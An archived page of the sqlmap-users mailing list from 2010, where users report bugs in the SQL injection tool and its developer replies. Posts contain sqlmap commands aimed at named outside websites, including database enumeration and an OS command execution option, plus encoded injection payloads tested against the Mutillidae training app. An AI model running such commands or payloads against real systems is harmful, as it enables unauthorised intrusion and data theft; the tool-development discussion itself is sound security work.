sqlmap-users Mailing List for sqlmap (Page 119)
Brought to you by: inquisb
From: Miroslav S. <mir...@gm...> - 2010-10-10 19:42:55
...by 40 pages i meant 40 pages of search results

bye

On Sun, Oct 10, 2010 at 9:41 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi.
>
> what are the limitations they've noticed? maybe there is a limitation
> in number of search pages, but during last testing google returned
> something about 40 pages to work with which is more than enough.
>
> i just know that there are no limitations that common google search
> has in doing large number of search queries in some short time period.
> as I remember common google search nags about you may be a "robot",
> but i suppose that they didn't expect it for anyone to do it via
> mobile search page.
>
> plz, just send them that python script i've sent to you. let them try.
>
> kind regards.
>
> On Sun, Oct 10, 2010 at 9:33 PM, Andres Riancho <and...@gm...> wrote:
>> Miroslav,
>>
>> Floyd Fuh and javier Andalia from the w3af dev team worked together to
>> implement a google mobile search wrapper and they noticed that it DOES have
>> limitations. Could you please confirm?
>>
>> Regards,
>> --
>> Andres Riancho
>>
>> On Sep 30, 2010 9:32 a.m., "Miroslav Stampar" <mir...@gm...> wrote:
>>
>>> ok. thanks for noting. if i get time i'll also do this one. right now
>>> results from plain google search seem to be more than enough.
>>>
>>> On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho <and...@gm...> wrote:
>>>> The script is cool, but my idea was to use google.com/codesearch...

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-10-10 19:41:42
hi.

what are the limitations they've noticed? maybe there is a limitation
in number of search pages, but during last testing google returned
something about 40 pages to work with which is more than enough.

i just know that there are no limitations that common google search
has in doing large number of search queries in some short time period.
as I remember common google search nags about you may be a "robot",
but i suppose that they didn't expect it for anyone to do it via
mobile search page.

plz, just send them that python script i've sent to you. let them try.

kind regards.

On Sun, Oct 10, 2010 at 9:33 PM, Andres Riancho <and...@gm...> wrote:
> Miroslav,
>
> Floyd Fuh and javier Andalia from the w3af dev team worked together to
> implement a google mobile search wrapper and they noticed that it DOES have
> limitations. Could you please confirm?
>
> Regards,
> --
> Andres Riancho
>
> On Sep 30, 2010 9:32 a.m., "Miroslav Stampar" <mir...@gm...> wrote:
>
>> ok. thanks for noting. if i get time i'll also do this one. right now
>> results from plain google search seem to be more than enough.
>>
>> On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho <and...@gm...> wrote:
>>> The script is cool, but my idea was to use google.com/codesearch...

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Andres R. <and...@gm...> - 2010-10-10 19:33:16
Miroslav,

Floyd Fuh and javier Andalia from the w3af dev team worked together to
implement a google mobile search wrapper and they noticed that it DOES have
limitations. Could you please confirm?

Regards,
--
Andres Riancho

On Sep 30, 2010 9:32 a.m., "Miroslav Stampar" <mir...@gm...> wrote:

> ok. thanks for noting. if i get time i'll also do this one. right now
> results from plain google search seem to be more than enough.
>
> On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho <and...@gm...> wrote:
>> The script is cool, but my idea was to use google.com/codesearch...
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-10-10 18:01:07
Hi.

In the last few days there was some major refactoring regarding injection
detection. As I am human, and humans make mistakes, all of you who used the
v0.9-dev version in the last 3-4 days have probably had false NEGATIVES with
the double-quote type of injections.

Sorry, and please update to have it fixed.

Kind regards.

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-10-10 17:56:50
no, there isn't an explanation :)

could you please send privately information about the site being attacked.
this way i have no idea why this happens.

also, which sqlmap version do you use?

kind regards.

On Sat, Oct 9, 2010 at 1:41 PM, Adri Kodde <adr...@ho...> wrote:
> Great project! Keep up the good work!
> I have one issue while communicating with a MySQL 4 database.
> Within the SQL shell I enter this query "SELECT 'foo'".
> After executing I get a list of weird characters, like: 'ۋ|'.
> Is there any explanation for getting these results?

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Adri K. <adr...@ho...> - 2010-10-09 11:41:55
Great project! Keep up the good work!

I have one issue while communicating with a MySQL 4 database. Within the SQL
shell I enter this query "SELECT 'foo'". After executing I get a list of weird
characters, like: 'ۋ|'. Is there any explanation for getting these results?
From: Miroslav S. <mir...@gm...> - 2010-10-09 00:26:40
also, i've tried your attack "vector" and couldn't find any results with that
site. is there any other way to retest it?

kr

On Sat, Oct 9, 2010 at 2:24 AM, Miroslav Stampar <mir...@gm...> wrote:
> hi.
>
> could you please send me privately content of a file:
> /home/unkq/sqlmap/output/www.cssd.cz/session
> for further analysis.
>
> also, please retry your testing with usage of flag: --flush-session.
>
> kind regards.
>
> On Fri, Oct 8, 2010 at 7:42 PM, Pavel Saparov <sap...@gm...> wrote:
>> Hello there, I got another error with sqlmap-0.9dev:
>>
>> $ python sqlmap.py -u "http://www.cssd.cz/vyhledat/?slovo=hledat" -v 1 -a "./txt/user-agents.txt" --current-db --threads 3
>>
>> [*] starting at: 19:21:53
>>
>> [19:21:53] [INFO] fetched random HTTP User-Agent header from file './txt/user-agents.txt': Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0
>> [19:21:53] [INFO] using '/home/unkq/sqlmap/output/www.cssd.cz/session' as session file
>> [19:21:53] [INFO] resuming match ratio '0.9' from session file
>> [19:21:53] [INFO] resuming injection point 'GET' from session file
>> [19:21:53] [INFO] resuming injection parameter 'slovo' from session file
>> [19:21:53] [INFO] resuming injection type 'stringdouble' from session file
>> [19:21:53] [INFO] resuming 2 number of parenthesis from session file
>> [19:21:53] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
>> [19:21:53] [INFO] testing connection to the target url
>> [19:21:58] [INFO] testing for parenthesis on injectable parameter
>> [19:21:58] [INFO] the back-end DBMS is Microsoft SQL Server
>>
>> web application technology: Apache
>> back-end DBMS: Microsoft SQL Server 2005
>> [19:21:58] [INFO] fetching current database
>> [19:21:58] [INFO] retrieving the length of query output
>> [19:21:58] [INFO] retrieved: 816555554554444447411111114444455444444121445455444511111
>>
>> [19:31:43] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
>> sqlmap version: 0.9-dev
>> Python version: 2.6.4
>> Operating system: posix
>> Traceback (most recent call last):
>>   File "sqlmap.py", line 96, in main
>>     start()
>>   File "/home/unkq/sqlmap/lib/controller/controller.py", line 281, in start
>>     action()
>>   File "/home/unkq/sqlmap/lib/controller/action.py", line 89, in action
>>     conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
>>   File "/home/unkq/sqlmap/plugins/generic/enumeration.py", line 131, in getCurrentDb
>>     kb.data.currentDb = inject.getValue(query)
>>   File "/home/unkq/sqlmap/lib/request/inject.py", line 374, in getValue
>>     value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
>>   File "/home/unkq/sqlmap/lib/request/inject.py", line 120, in __goInferenceProxy
>>     output = resume(expression, payload)
>>   File "/home/unkq/sqlmap/lib/utils/resume.py", line 164, in resume
>>     if len(resumedValue) == int(length):
>> ValueError: invalid literal for int() with base 10: '816555554554444447411\x02111114444455444444\x02\x021\x02214454554445111\x0211'
>>
>> [*] shutting down at: 19:31:43

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-10-09 00:24:10
hi.

could you please send me privately content of a file:
/home/unkq/sqlmap/output/www.cssd.cz/session
for further analysis.

also, please retry your testing with usage of flag: --flush-session.

kind regards.

On Fri, Oct 8, 2010 at 7:42 PM, Pavel Saparov <sap...@gm...> wrote:
> Hello there, I got another error with sqlmap-0.9dev:
>
> $ python sqlmap.py -u "http://www.cssd.cz/vyhledat/?slovo=hledat" -v 1 -a "./txt/user-agents.txt" --current-db --threads 3
>
> [*] starting at: 19:21:53
>
> [19:21:53] [INFO] fetched random HTTP User-Agent header from file './txt/user-agents.txt': Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0
> [19:21:53] [INFO] using '/home/unkq/sqlmap/output/www.cssd.cz/session' as session file
> [19:21:53] [INFO] resuming match ratio '0.9' from session file
> [19:21:53] [INFO] resuming injection point 'GET' from session file
> [19:21:53] [INFO] resuming injection parameter 'slovo' from session file
> [19:21:53] [INFO] resuming injection type 'stringdouble' from session file
> [19:21:53] [INFO] resuming 2 number of parenthesis from session file
> [19:21:53] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
> [19:21:53] [INFO] testing connection to the target url
> [19:21:58] [INFO] testing for parenthesis on injectable parameter
> [19:21:58] [INFO] the back-end DBMS is Microsoft SQL Server
>
> web application technology: Apache
> back-end DBMS: Microsoft SQL Server 2005
> [19:21:58] [INFO] fetching current database
> [19:21:58] [INFO] retrieving the length of query output
> [19:21:58] [INFO] retrieved: 816555554554444447411111114444455444444121445455444511111
>
> [19:31:43] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.9-dev
> Python version: 2.6.4
> Operating system: posix
> Traceback (most recent call last):
>   File "sqlmap.py", line 96, in main
>     start()
>   File "/home/unkq/sqlmap/lib/controller/controller.py", line 281, in start
>     action()
>   File "/home/unkq/sqlmap/lib/controller/action.py", line 89, in action
>     conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
>   File "/home/unkq/sqlmap/plugins/generic/enumeration.py", line 131, in getCurrentDb
>     kb.data.currentDb = inject.getValue(query)
>   File "/home/unkq/sqlmap/lib/request/inject.py", line 374, in getValue
>     value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
>   File "/home/unkq/sqlmap/lib/request/inject.py", line 120, in __goInferenceProxy
>     output = resume(expression, payload)
>   File "/home/unkq/sqlmap/lib/utils/resume.py", line 164, in resume
>     if len(resumedValue) == int(length):
> ValueError: invalid literal for int() with base 10: '816555554554444447411\x02111114444455444444\x02\x021\x02214454554445111\x0211'
>
> [*] shutting down at: 19:31:43

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Pavel S. <sap...@gm...> - 2010-10-08 17:42:56
Hello there, I got another error with sqlmap-0.9dev:

$ python sqlmap.py -u "http://www.cssd.cz/vyhledat/?slovo=hledat" -v 1 -a "./txt/user-agents.txt" --current-db --threads 3

[*] starting at: 19:21:53

[19:21:53] [INFO] fetched random HTTP User-Agent header from file './txt/user-agents.txt': Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0
[19:21:53] [INFO] using '/home/unkq/sqlmap/output/www.cssd.cz/session' as session file
[19:21:53] [INFO] resuming match ratio '0.9' from session file
[19:21:53] [INFO] resuming injection point 'GET' from session file
[19:21:53] [INFO] resuming injection parameter 'slovo' from session file
[19:21:53] [INFO] resuming injection type 'stringdouble' from session file
[19:21:53] [INFO] resuming 2 number of parenthesis from session file
[19:21:53] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[19:21:53] [INFO] testing connection to the target url
[19:21:58] [INFO] testing for parenthesis on injectable parameter
[19:21:58] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Apache
back-end DBMS: Microsoft SQL Server 2005
[19:21:58] [INFO] fetching current database
[19:21:58] [INFO] retrieving the length of query output
[19:21:58] [INFO] retrieved: 816555554554444447411111114444455444444121445455444511111

[19:31:43] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.9-dev
Python version: 2.6.4
Operating system: posix
Traceback (most recent call last):
  File "sqlmap.py", line 96, in main
    start()
  File "/home/unkq/sqlmap/lib/controller/controller.py", line 281, in start
    action()
  File "/home/unkq/sqlmap/lib/controller/action.py", line 89, in action
    conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
  File "/home/unkq/sqlmap/plugins/generic/enumeration.py", line 131, in getCurrentDb
    kb.data.currentDb = inject.getValue(query)
  File "/home/unkq/sqlmap/lib/request/inject.py", line 374, in getValue
    value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
  File "/home/unkq/sqlmap/lib/request/inject.py", line 120, in __goInferenceProxy
    output = resume(expression, payload)
  File "/home/unkq/sqlmap/lib/utils/resume.py", line 164, in resume
    if len(resumedValue) == int(length):
ValueError: invalid literal for int() with base 10: '816555554554444447411\x02111114444455444444\x02\x021\x02214454554445111\x0211'

[*] shutting down at: 19:31:43
From: Miroslav S. <mir...@gm...> - 2010-10-05 15:07:46
this was fun to test :)

you've used info: user_name=test&password=1234 while you haven't made that
account in Mutillidae (that link Register on Login page).

problem goes like this. sqlmap tests some sql expression for being TRUE when
testing one of sql injection vectors (like that: "testing unescaped numeric
injection on POST parameter 'password'"), while it also has a double check
vector which is of the same kind but it must return FALSE. while sqlmap is
AND based, and in your case both checks for all vectors returned FALSE ("Bad
user name or password!"), sqlmap is not able to properly detect sql injection
existence.

this could be a good test case for implementing OR based sql injection support
too, for cases like this one.

kind regards.

On Tue, Oct 5, 2010 at 3:45 PM, ts2112 <ts...@go...> wrote:
> Hi!
>
> I used the publicly available mutillidae test application to test sqlmap.
> Whatever I do I get the response "all parameters are not injectable"
> although this is definitely not the case, as a burp trace shows. Example:
>
> ===== Command:
>
> $ ./sqlmap.py -u "http://was.sntest.sn/mutillidae/index.php?page=login.php" --data="user_name=test&password=1234&Submit_button=Submit" --method=POST -v 0 --tables --flush-session -p password --proxy "http://localhost:15000"
>
> ===== Result 0.9 (similar with 0.8):
> >>>>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 15:26:01
>
> [15:26:05] [CRITICAL] all parameters are not injectable
>
> [*] shutting down at: 15:26:05
> <<<<
>
> ===== Among the 38 requests that burp shows are these 2
> >>>>
> 1. Request
> --------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <headers>
> user_name=test&password=1234%29%29%29%20AND%20%28%28%283304=3305&Submit_button=Submit
>
> 1. Response (no SQL-Injection evidence)
> --------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 5091
> Connection: close
> Content-Type: text/html
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
> <html>
> <head>
> <meta content="text/html; charset=us-ascii" http-equiv="content-type">
> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
> </head>
> <body>
> <table border="0" width="100%" cellspacing="0" cellpadding="0">
> <tr><td bgcolor="#88ff88"align="center" colspan="2">
> <table width="100%">
> <td valign="top"><a href="index.php"><img border="0" align="top" src="images/coykillericon.png"></a><br>Version 1.3</td>
> <td align="center" valign="top"><h1><b>Mutillidae: Hack, Learn, Secure, Have Fun!!!</b></h1>
> <font color="#ff0000">Not logged in</font>
> ...
>
> 2. Request
> ------------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <Headers>
> user_name=test&password=1234%27%29%29%29%20AND%20%28%28%28%27xUjr%27=%27xUjr&Submit_button=Submit
>
> 2. Response (evidence of SQL-Injection)
> ------------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 359
> Connection: close
> Content-Type: text/html
>
> Did you <a href="setupreset.php">setup/reset the DB</a>? <p><b>SQL Error:</b>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))) AND ((('xUjr'='xUjr'' at line 1<p><b>SQL Statement:</b>SELECT * FROM accounts WHERE username='test' AND password='1234'))) AND ((('xUjr'='xUjr'
> <<<<
>
> To my understanding, by the difference of those responses and the pattern in
> the second sqlmap should recognize that there *is* an SQL Injection.
>
> Thank you!
>
> Thomas

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: ts2112 <ts...@go...> - 2010-10-05 13:45:40
Hi!

I used the publicly available mutillidae test application to test sqlmap.
Whatever I do I get the response "all parameters are not injectable"
although this is definitely not the case, as a burp trace shows. Example:

===== Command:

$ ./sqlmap.py -u "http://was.sntest.sn/mutillidae/index.php?page=login.php" --data="user_name=test&password=1234&Submit_button=Submit" --method=POST -v 0 --tables --flush-session -p password --proxy "http://localhost:15000"

===== Result 0.9 (similar with 0.8):
>>>>
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 15:26:01

[15:26:05] [CRITICAL] all parameters are not injectable

[*] shutting down at: 15:26:05
<<<<

===== Among the 38 requests that burp shows are these 2
>>>>
1. Request
--------------
POST /mutillidae/index.php?page=login.php HTTP/1.1
... <headers>
user_name=test&password=1234%29%29%29%20AND%20%28%28%283304=3305&Submit_button=Submit

1. Response (no SQL-Injection evidence)
--------------
HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 13:26:04 GMT
Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.3.0
Content-Length: 5091
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<meta content="text/html; charset=us-ascii" http-equiv="content-type">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
</head>
<body>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
<tr><td bgcolor="#88ff88"align="center" colspan="2">
<table width="100%">
<td valign="top"><a href="index.php"><img border="0" align="top" src="images/coykillericon.png"></a><br>Version 1.3</td>
<td align="center" valign="top"><h1><b>Mutillidae: Hack, Learn, Secure, Have Fun!!!</b></h1>
<font color="#ff0000">Not logged in</font>
...

2. Request
------------------
POST /mutillidae/index.php?page=login.php HTTP/1.1
... <Headers>
user_name=test&password=1234%27%29%29%29%20AND%20%28%28%28%27xUjr%27=%27xUjr&Submit_button=Submit

2. Response (evidence of SQL-Injection)
------------------
HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 13:26:04 GMT
Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.3.0
Content-Length: 359
Connection: close
Content-Type: text/html

Did you <a href="setupreset.php">setup/reset the DB</a>? <p><b>SQL Error:</b>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))) AND ((('xUjr'='xUjr'' at line 1<p><b>SQL Statement:</b>SELECT * FROM accounts WHERE username='test' AND password='1234'))) AND ((('xUjr'='xUjr'
<<<<

To my understanding, by the difference of those responses and the pattern in
the second sqlmap should recognize that there *is* an SQL Injection.

Thank you!

Thomas
From: prashant j. <pra...@gm...> - 2010-10-03 17:25:42
it works, thanks

On Thu, Sep 30, 2010 at 11:00 PM, prashant jadhav <pra...@gm...> wrote:
> hi,
> While testing the --os-cmd=ls in sqlmap 0.9 dev I'm getting the following
> error
>
> Please advise
> The details are
>
> URL = sudo python ./sqlmap.py -u "http://xxx/bbb.php?article_id=2322" --os-cmd=ls -v 1
>
> "
> [23:06:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.9-dev
> Python version: 2.5.2
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 280, in start
>     action()
>   File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 152, in action
>     conf.dbmsHandler.osCmd()
>   File "/pentest/database/sqlmap-dev/plugins/generic/takeover.py", line 66, in osCmd
>     self.initEnv(web=web)
>   File "/pentest/database/sqlmap-dev/lib/takeover/abstraction.py", line 154, in initEnv
>     self.webInit()
>   File "/pentest/database/sqlmap-dev/lib/takeover/web.py", line 198, in webInit
>     uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
>   File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 174, in getPage
>     conn = urllib2.urlopen(req)
>   File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
>     return _opener.open(url, data)
>   File "/usr/lib/python2.5/urllib2.py", line 381, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.5/urllib2.py", line 399, in _open
>     '_open', req)
>   File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
>     h = http_class(host) # will parse host:port
>   File "/usr/lib/python2.5/httplib.py", line 639, in __init__
>     self._set_hostport(host, port)
>   File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '80jpma'
>
> [*] shutting down at: 23:06:37
> "
From: Miroslav S. <mir...@gm...> - 2010-10-01 08:04:45
thanks. you are absolutely right. i've done the necessary changes. thanks for
the report. check out the latest version from our SVN repository to have it
fixed.

kind regards.

On Fri, Oct 1, 2010 at 7:03 AM, Brandon E. <bra...@gm...> wrote:
> When using the Google 'dork' feature (-g option) in the latest development
> version of sqlmap (and what I can only assume would be all previous
> versions), it appears that when Google returns results it encodes HTML
> entities like the ampersand "&" with "&amp;". sqlmap does not do anything
> with these encoded entities and results in improperly named
> variables/parameters being checked.
>
> Observe the following output:
>
> [23:50:28] [WARNING] GET parameter 'amp;s' is not dynamic
> [23:50:28] [INFO] testing if GET parameter 'amp;id' is dynamic
> [23:50:29] [WARNING] GET parameter 'amp;id' is not dynamic
> [23:50:29] [INFO] testing if GET parameter 'amp;Name' is dynamic
>
> As "&amp;" isn't converted to "&" prior to the disassembly of the URL for
> testing, sqlmap is under the impression that variable names are different
> than what they should be, and the wrong variables get tested.
>
> I have written a one-line patch to remedy this. In lib/utils/google.py, line
> 74 adds the target URL. Prior to the targetUrls.add() statement, place the
> following:
>
>     match = match.replace("&amp;", "&")
>
> This results in the for match .. block that the statements are contained in
> resembling:
>
>     for match in self.__matches:
>         if re.search("(.*?)\?(.+)", match, re.I):
>             match = match.replace("&amp;", "&")
>             kb.targetUrls.add(( match, None, None, None ))
>
> If I am wrong and the right variables are being tested (but not properly
> displayed in the verbose output), please let me know. Otherwise this patch
> should be committed to the codebase in order to remedy this Google search
> results issue.
>
> - Brandon

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Brandon E. <bra...@gm...> - 2010-10-01 05:03:12
When using the Google 'dork' feature (-g option) in the latest development
version of sqlmap (and what I can only assume would be all previous
versions), it appears that when Google returns results it encodes HTML
entities like the ampersand "&" with "&amp;". sqlmap does not do anything
with these encoded entities and results in improperly named
variables/parameters being checked.

Observe the following output:

[23:50:28] [WARNING] GET parameter 'amp;s' is not dynamic
[23:50:28] [INFO] testing if GET parameter 'amp;id' is dynamic
[23:50:29] [WARNING] GET parameter 'amp;id' is not dynamic
[23:50:29] [INFO] testing if GET parameter 'amp;Name' is dynamic

As "&amp;" isn't converted to "&" prior to the disassembly of the URL for
testing, sqlmap is under the impression that variable names are different
than what they should be, and the wrong variables get tested.

I have written a one-line patch to remedy this. In lib/utils/google.py, line
74 adds the target URL. Prior to the targetUrls.add() statement, place the
following:

    match = match.replace("&amp;", "&")

This results in the for match .. block that the statements are contained in
resembling:

    for match in self.__matches:
        if re.search("(.*?)\?(.+)", match, re.I):
            match = match.replace("&amp;", "&")
            kb.targetUrls.add(( match, None, None, None ))

If I am wrong and the right variables are being tested (but not properly
displayed in the verbose output), please let me know. Otherwise this patch
should be committed to the codebase in order to remedy this Google search
results issue.

- Brandon
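What Brandon's report describes, shown concretely as an added example (not sqlmap's code and not from his message): a search-result href as it sits in the page HTML, with "&amp;" between the query parameters, is split into parameter names once as-is and once after HTML-unescaping. The first pass yields the 'amp;'-prefixed names seen in his log; the second yields the real ones. The URL and parameter names are constructed for the example, and it uses Python's standard html.unescape as a generalisation of the posted one-line replace, so other entities in the href are decoded too while percent-encoding inside values is left alone.

```python
from html import unescape
from urllib.parse import unquote, urlsplit

# Constructed search-result href (not a real result): the page HTML carries "&amp;"
# between query parameters, as any well-formed HTML attribute value must.
RAW_HREF = "http://example.test/news.php?id=10&amp;s=hello&amp;Name=x%26y"


def parameters(url):
    """Name -> decoded value, as a GET-parameter scanner would see them.
    The query is split on '&' first and percent-decoded afterwards, so a
    literal '&' inside a value (%26) survives as data, not as a separator."""
    out = {}
    for pair in urlsplit(url).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        out[name] = unquote(value)
    return out


def parameter_names(url):
    """Just the parameter names, in order of appearance."""
    return list(parameters(url))


def normalize_result_url(href):
    """Decode HTML entities in an href before treating it as a URL.
    html.unescape handles &amp;, &#38; and the other entity forms, which a
    single str.replace of "&amp;" would not; percent-encoding is untouched."""
    return unescape(href)


if __name__ == "__main__":
    print(parameter_names(RAW_HREF))                        # ['id', 'amp;s', 'amp;Name']
    print(parameter_names(normalize_result_url(RAW_HREF)))  # ['id', 's', 'Name']
```

Order matters: unescape the href first, then split the query. Doing it the other way round leaves the "amp;" prefix fused to each name, which is exactly the output in the report.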
From: Miroslav S. <mir...@gm...> - 2010-09-30 18:53:46
i think i've found it. please try with the updated version from SVN repository.

kind regards.

On Thu, Sep 30, 2010 at 7:30 PM, prashant jadhav <pra...@gm...> wrote:
> hi ,
> While testing the --os-cmd=ls in sqlmap 0.9 dev i m getting the following
> error
>
> Please advice
> The details are
>
> URL = sudo python ./sqlmap.py -u "http://xxx/bbb.php?article_id=2322"
> --os-cmd=ls -v 1
>
> "
> [23:06:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.9-dev
> Python version: 2.5.2
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 280, in start
>     action()
>   File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 152, in action
>     conf.dbmsHandler.osCmd()
>   File "/pentest/database/sqlmap-dev/plugins/generic/takeover.py", line 66, in osCmd
>     self.initEnv(web=web)
>   File "/pentest/database/sqlmap-dev/lib/takeover/abstraction.py", line 154, in initEnv
>     self.webInit()
>   File "/pentest/database/sqlmap-dev/lib/takeover/web.py", line 198, in webInit
>     uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
>   File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 174, in getPage
>     conn = urllib2.urlopen(req)
>   File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
>     return _opener.open(url, data)
>   File "/usr/lib/python2.5/urllib2.py", line 381, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.5/urllib2.py", line 399, in _open
>     '_open', req)
>   File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
>     h = http_class(host) # will parse host:port
>   File "/usr/lib/python2.5/httplib.py", line 639, in __init__
>     self._set_hostport(host, port)
>   File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '80jpma'
>
> [*] shutting down at: 23:06:37
> "
>

--
Miroslav Stampar

